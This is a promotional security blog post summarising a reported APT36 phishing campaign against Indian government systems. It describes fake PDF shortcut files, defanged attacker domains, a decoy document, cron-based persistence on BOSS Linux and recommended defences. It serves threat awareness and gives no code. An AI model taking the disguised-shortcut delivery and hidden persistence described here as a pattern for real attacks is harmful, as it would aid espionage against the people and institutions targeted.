Indian Government Systems Under Attack: Hackers Deploy Fake Shortcut Files – Softlink India

By /

Introduction

Cybersecurity threats against national infrastructure are becoming increasingly sophisticated. Recently, researchers revealed that Indian government systems are under attack: hackers deploy fake shortcut files disguised as PDF documents to deliver malware. This campaign, attributed to Pakistan-linked hacking group Transparent Tribe (APT36), has raised fresh concerns about data security, espionage, and long-term surveillance of critical Indian institutions.

The alarming discovery, made by cybersecurity firm CYFIRMA, highlights how attackers are evolving from traditional Windows-based threats to also target India’s indigenous Linux-based systems like BOSS (Bharat Operating System Solutions). As Softlink India emphasizes, such incidents prove that protecting sensitive data is no longer optional—it’s a national security imperative.

How the Attack Works

According to CYFIRMA’s report, the campaign begins with phishing emails that appear to contain official meeting invitations. Victims receive a file named something like “Meeting_Ltr_ID1543ops.pdf.desktop”. While the file looks like a harmless PDF, it is actually a malicious shortcut file (.desktop) designed to install spyware.

Step-by-step breakdown:

  1. Delivery through phishing – The fake document arrives in an email that appears legitimate.

  2. Execution of malicious file – Clicking the attachment runs the shortcut instead of opening a PDF.

  3. Malware installation – The shortcut silently downloads payloads from attacker-controlled servers such as securestore[.]cv and modgovindia[.]space.

  4. Decoy distraction – To avoid suspicion, a real PDF hosted on Google Drive opens in Firefox, tricking the victim into thinking they opened a meeting document.

  5. Persistence – On Linux BOSS, the malware sets up a cron job to execute a hidden payload (.config/systemd/systemd-update) every time the system reboots.

  6. Espionage – Once installed, the malware steals sensitive files, harvests credentials, and provides long-term remote access.

This makes the attack extremely dangerous, as it blends social engineering, stealthy payloads, and persistent backdoors to infiltrate government networks.

Why Indian Government Systems Are the Target

The fact that Indian government systems are under attack: hackers deploy fake shortcut files is no coincidence. Transparent Tribe has long been associated with targeting Indian defense, government, and critical infrastructure.

Indian agencies store:

  • Defense and strategic data including procurement records and military communications.

  • Citizen information such as Aadhaar details, tax filings, and personal records.

  • Financial and policy documents related to budgets and economic planning.

  • Infrastructure blueprints including energy, transportation, and communication systems.

By compromising such assets, attackers gain not only espionage benefits but also long-term geopolitical leverage.

Evolution of Transparent Tribe (APT36)

Transparent Tribe has been active for over a decade. Earlier, their campaigns mostly relied on Windows-based malware and phishing lures. However, this latest operation shows a significant tactical shift:

  • Moving from only Windows to also targeting Linux BOSS OS, a government-backed system widely deployed in Indian departments.

  • Using weaponized .desktop files, a new delivery method rarely seen in earlier attacks.

  • Combining malware with credential-harvesting websites that mimic Indian government portals, even bypassing Kavach 2FA (used since 2022).

This adaptability makes APT36 particularly dangerous. They are no longer limited to one platform but aim to exploit multiple attack vectors—Windows, Linux, and even mobile devices.

Real-World Impact of the Campaign

The discovery that Indian government systems are under attack: hackers deploy fake shortcut files signals several potential consequences:

  • Data Theft – Classified government documents and strategic information could be stolen and misused.

  • Long-Term Espionage – By maintaining persistence, attackers can monitor operations for months without being detected.

  • Reputation Damage – Breaches undermine public trust in digital governance initiatives.

  • Operational Disruption – Malware infections can slow down or disable essential services.

For Softlink India, which advocates stronger cybersecurity practices, this campaign demonstrates the importance of building resilient IT infrastructures.

Why Target BOSS Linux?

One of the most striking details of this campaign is the focus on BOSS Linux, India’s indigenous operating system. Since BOSS is widely adopted in government departments for security reasons, targeting it gives attackers direct access to sensitive systems.

The malware achieves persistence by adding a cron job that reloads the hidden payload after every reboot. This ensures continuous access and makes detection harder, especially in organizations not trained to identify Linux-based threats.

This marks a major strategic evolution, as hackers are no longer only exploiting global software platforms but also tailoring attacks to indigenous technologies.

Recommendations & Mitigation

Since Indian government systems are under attack: hackers deploy fake shortcut files, experts recommend immediate action. Softlink India suggests:

  1. Strong Email Security – Deploy gateways that filter suspicious attachments.

  2. Regular Cybersecurity Training – Educate government staff about phishing and disguised file formats.

  3. Least-Privilege Controls – Harden Linux BOSS by limiting user permissions.

  4. Endpoint Detection & Response (EDR) – Detect anomalies in file execution and system processes.

  5. IOC/YARA Integration – Update systems with threat intelligence indicators to catch malware early.

  6. Patch Management – Apply timely updates to fix vulnerabilities.

  7. Multi-Factor Authentication Monitoring – Ensure that 2FA solutions like Kavach cannot be bypassed by fake portals.

The Bigger Picture

This incident highlights the growing national security risks posed by APT groups. If successful, such attacks could lead to:

  • Theft of classified defense and diplomatic information

  • Disruption of critical government operations

  • Long-term surveillance and monitoring of Indian agencies

As APT36 continues to refine its methods, India faces the challenge of defending against multi-platform cyber-espionage campaigns that exploit both human error and technical weaknesses.

Read More :- Android Malware Poses as Antivirus to Spy on Russian Businesses

Conclusion

The revelation that Indian government systems are under attack: hackers deploy fake shortcut files disguised as PDFs is a stark reminder of how creative and persistent nation-linked hacking groups have become. By shifting to Linux BOSS and using fake portals to harvest credentials, Transparent Tribe has shown its ability to adapt and remain a long-term threat.

Government agencies must invest in advanced defenses, employee training, and proactive monitoring to prevent future breaches. Cybersecurity is no longer just about installing antivirus—it’s about building resilience against sophisticated campaigns.

As Softlink India stresses, safeguarding national data requires vigilance, awareness, and continuous adaptation. The threat may evolve, but with the right defenses in place, India can protect its government systems from the growing tide of cyber-espionage.

FAQs

1. How are Indian government systems under attack with fake shortcut files?

Hackers are sending phishing emails with malicious .desktop files disguised as PDFs. When opened, they install malware in the background, targeting Indian government systems.

2. What is the role of Transparent Tribe (APT36) in these attacks?

Transparent Tribe, a Pakistan-linked hacking group, is behind the campaign. They use fake shortcut files to compromise both Windows and Linux BOSS systems in India.

3. Why is Linux BOSS targeted in this cyberattack?

BOSS is widely used in Indian government departments. By deploying weaponized .desktop files, attackers gain persistence and long-term access to critical systems.

4. What risks arise when hackers deploy fake shortcut files?

These attacks can lead to data theft, espionage, disruption of services, and unauthorized access to sensitive Indian government information.

5. How can Softlink India help prevent such attacks?

Softlink India emphasizes proactive security measures like user training, email filtering, endpoint detection, and BOSS hardening to defend against shortcut file malware.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top